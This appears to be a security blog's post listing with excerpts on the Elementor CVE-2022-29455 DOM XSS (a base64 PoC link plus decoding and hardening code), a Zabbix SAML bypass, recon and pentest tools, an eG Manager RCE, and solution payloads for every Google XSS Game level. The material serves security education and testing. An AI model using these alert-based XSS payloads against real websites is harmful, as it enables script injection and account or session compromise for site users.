CVE-2022-29455 is still affecting millions of WordPress sites

– The DOM-based reflected cross-site scripting (XSS) vulnerability is in Elementor's Elementor Website Builder plugin, versions <= 3.5.5. The issue is tracked as CVE-2022-29455. 4websecurity.com has already reported the vulnerability to tens of thousands of websites that run WordPress with this version of the plugin.

References:
– https://nvd.nist.gov/vuln/detail/CVE-2022-29455
– https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor
– https://www.rotem-bar.com/elementor

* PoC (proof of concept): the settings parameter is base64-encoded:
https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=

Decoded from base64:
https://example.com/#elementor-action:action=lightbox&settings={"type":"video","url":"http://","videoType":"hosted","videoParams":{"onerror":"alert(document.domain)"}}

Impact: XSS can cause…
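The PoC above carries the lightbox settings base64-encoded in the URL fragment, and its "videoParams" keys evidently end up as attributes on the player element, which is why an "onerror" key turns into an inline event handler. As an added illustration (not Elementor's code), the following decodes the post's own PoC fragment and contrasts the copy-every-key pattern with an allow-listed one. The parsing helper, the attribute allow-list and all function names are assumptions made for the example.

```javascript
// Added illustration for CVE-2022-29455; this is not Elementor's code.
// Function names, the parsing helper and the allow-list are assumptions.

// The PoC fragment from the post (settings decode to the JSON shown above).
const POC_FRAGMENT =
  '#elementor-action:action=lightbox&settings=' +
  'eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwi' +
  'dmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=';

// Works in a browser (atob) and in Node (Buffer).
function base64Decode(s) {
  return typeof atob === 'function' ? atob(s) : Buffer.from(s, 'base64').toString('utf8');
}

// Parse "#elementor-action:action=<name>&settings=<base64 JSON>" into an object.
function parseElementorAction(fragment) {
  const prefix = '#elementor-action:';
  if (!fragment.startsWith(prefix)) return null;
  const params = new URLSearchParams(fragment.slice(prefix.length));
  const settingsB64 = params.get('settings');
  if (!settingsB64) return null;
  // URLSearchParams turns '+' into a space; restore it before base64-decoding.
  const settings = JSON.parse(base64Decode(settingsB64.replace(/ /g, '+')));
  return { action: params.get('action'), settings };
}

// Vulnerable pattern: every key/value in videoParams is copied onto the element,
// so "onerror" (or any other on* name) lands as an inline event handler.
function videoAttrsVulnerable(settings) {
  return Object.assign({ src: settings.url }, settings.videoParams || {});
}

// Hardened pattern: only known player options are honoured; attacker-chosen
// names such as onerror never reach the element. The allow-list is hypothetical.
const ALLOWED_VIDEO_PARAMS = new Set(['autoplay', 'loop', 'muted', 'controls', 'playsinline']);

function videoAttrsSafe(settings) {
  const attrs = { src: String(settings.url) };
  for (const [key, value] of Object.entries(settings.videoParams || {})) {
    const k = key.toLowerCase();
    if (ALLOWED_VIDEO_PARAMS.has(k)) attrs[k] = value;
  }
  return attrs;
}
```

Decoding the fragment in the page is the quickest triage step: if the `videoParams` object carries any key beginning with `on`, the request is an attack attempt rather than a legitimate lightbox link.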

Zabbix – SAML SSO Authentication Bypass

In instances where SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.

Dork:

Usage and references:
https://nvd.nist.gov/vuln/detail/CVE-2022-23131
https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
https://github.com/Mr-xn/cve-2022-23131
https://github.com/projectdiscovery/nuclei-templates

The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and what not

You must have heard about time travel in movies, series and comics. Well, here we are. Nah, I'm not joking: you can travel back in time and fetch the endpoints from web applications for further exploitation. Don't believe me? xD You will after travelling with TheTimeMachine. PS: it doesn't work offline, you need internet…

The most used Chrome extensions for penetration testing

Penetration testers mostly use these extensions to locate broken links and report them to the client; the extensions also help determine whether a target website contains vulnerabilities that could lead to exploitation and theft of sensitive information. Here are the different Chrome extensions used in penetration testing…. Wappalyzer…

eG Manager v7.1.2: Improper Access Control lead to Remote Code Execution (CVE-2020-8591)

Improper Access Control to Remote Code Execution (CVE-2020-8591)

In this post I will explain how I hacked a whole system by exploiting an improper access control vulnerability in the popular Java-based MaaS software "eG Manager", and how I escalated it to execute code remotely.

Impact

The Improper Access Control weakness describes a case where software fails to properly restrict access to an object. A malicious user can compromise the security of the software and perform unauthorized actions: gaining elevated privileges, reading otherwise restricted information, executing commands, bypassing the implemented security mechanisms, etc.

Google XSS Game

https://xss-game.appspot.com/

Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page

Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: “welcome” post contains HTML

Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss

Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')

Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')

Testing for XSS (Cross Site Scripting)

Hi, so today I'll tell you some techniques for testing XSS. First of all, these are important things you should note: copy-pasting XSS payloads doesn't work. PoC or GTFO: as it's said, report checkers need a proper PoC to validate the report; if it's missing, your report cannot be triaged. So first, for testing XSS you…